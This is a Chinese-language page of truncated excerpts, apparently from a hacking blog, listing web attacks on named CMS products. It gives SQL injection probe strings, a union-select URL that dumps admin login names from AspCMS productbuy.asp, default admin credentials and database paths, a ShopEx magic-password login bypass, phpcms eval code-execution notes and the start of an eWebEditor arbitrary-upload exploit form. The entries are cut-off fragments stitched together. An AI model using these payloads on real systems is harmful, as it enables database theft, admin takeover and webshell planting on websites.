2011 0 第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。 否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。 数字型：and 1=1 and 1=2 判断是否存在注入 字符型：’ and ’1′=’1 ‘ and ’1′=’2 搜索型： 关键字%’ and 1=1 and ‘%’='% 关键字%’ and 1=2 and ‘%’='% IIS报错情况下使用： and user>0 （判断是ACCESS还是MSSQL） 不报...

From www.0855.tv  by Mr.DzY   世纪风企业网站管理系统面向中小企业的网站管理系统,网页精美,大气。具有稳性定强,功能多,安全,代码加载速度快,网站内容管理的易操作性等优点。采用div+css构架,是中小型企业建站的理想选择。   世纪风企业网站管理系统 1.3 更新内容： 1、增加部分后台提示； 2、修复后台订单管理中删除订单出现的错误； 3、其它细节的修改；     免费版： http://www.badguest.cn /_database/qiye_free.asp   企业版： http://www.badguest.cn/_database/_qiyedata.asp   插马： http://www.badgu...

g.cn关键字：6CMS企业望站管理系统(中英繁三语版) 默认帐号密码：admin 后台：admin/ 也不知道程序员怎么弄得，我看到程序admin目录下有个防注入的sql.asp 但是上级目录却没有 默认数据库：data/#sze7xiaohu.mdb seeion验证感觉也有点乱来，记得有个admin目录下发布职位的文件可以直接访问（具体哪个文件），貌似可以直接发布消息 直接放啊D。 后台也直接数据库备份。 感觉没啥利用价值。没意思，自己当研究玩吧

aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且 支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。 漏洞文件：/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转，所以要快，建议用快捷键复制 爆用户名EXP: http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1 这是爆ID...

phpcms v9 后台的一个(sql inj)2(code exec)漏洞 – 低调求发展# `0 T6 X# F: V) j: e6 i by flyh4t - 低调求发展7 K) c’ j. K( g/ \# i( r phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 function string2array($data) {     if($data == ”) return array();     eval(“\$array = $data;”);     return $array; } 复制代码 比如投票结果统计(需要后台权限) /moudles/vote/vote.php /**      * 投票结果统计      */     public function statistics() {            ...

前言:这段时间一直在努力学习漏洞分析,并参考了failwest大牛制作<0day第二版>, 暴风m3u文件读取漏洞(看雪网->鲜果也曾对其进行分析),小弟不才,只能跟着大牛后面跑. 附:暴风m3u分析,是在同事dge的帮助下完成的调试,乘热打铁,自己分析了同一类型(mplayer播放器)漏洞.也算是对自己知识的总结,第一次写文章,还请大家指责批评,不清楚的地方可以发邮件问我 测试环境:   windows xp sp3_cn (实体机测试，没有使用虚拟机)     ollyice看雪版   poc和测试软件版本见:http://www.exploit-db.com/exploits/17565/   ...

shopex v4.8.5商店系统搭建的。 在网站后面加上/shopadmin/跳出网站管理后台页面。shopex v4.8.5报过一个后台万能密码漏洞。 漏洞原因： 直接看代码： public function tryLogin( $aValue, $issuper = false ) { if ( $aValue['passwd'] == “+_-_-_+” ) { $aValue['passwd'] = “”; } $sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue['usrname']}’ AND userpass = ‘”.md5( $aValue['passwd'] ).”‘ AND disabled=’false’”; if ( $issuper ) { $sql .= ” AND super=’1′”; } return $this->d...

话说无聊去代码网站下套程序分析分析 可到了这个云起企业建站系统 下载数挺多的 于是乎看了起来 首先看到了它的后台login.asp文件。。一看 边觉得蛋疼。。。   if request.Form(“submit”)<>”" then if request.Form(“userid”)=”" or request.Form(“password”)=”" then response.Write(“<script language=javascript>alert(‘用户名或者密码不能为空！’);history.back();</script>”) response.end end if   set rs=conn.execute(“select * from gly where uid=’”&trim(requ...

 aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。       漏洞出现在   /plug/productbuy.asp   对接收的参数id没有进行过滤而导致的注入漏洞   注入后的页面有跳转，所以要快，建议用快捷键复制   爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1   这是爆ID=1的账...

  <title>eWebeditoR3.8 for php任意文件上EXP</title> <form action=”" method=post enctype=”multipart/form-data”>  <INPUT TYPE=”hidden” name=”MAX_FILE_SIZE” value=”512000″>  <A href=”http://hi.baidu.com/fc/editor/<input”>URL:<input type=text name=url value=”http://hi.baidu.com/dg8bk/eWebEditor/” size=100><br>  <INPUT TYPE=”hidden” name=”aStyle[12]” value=”toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|j...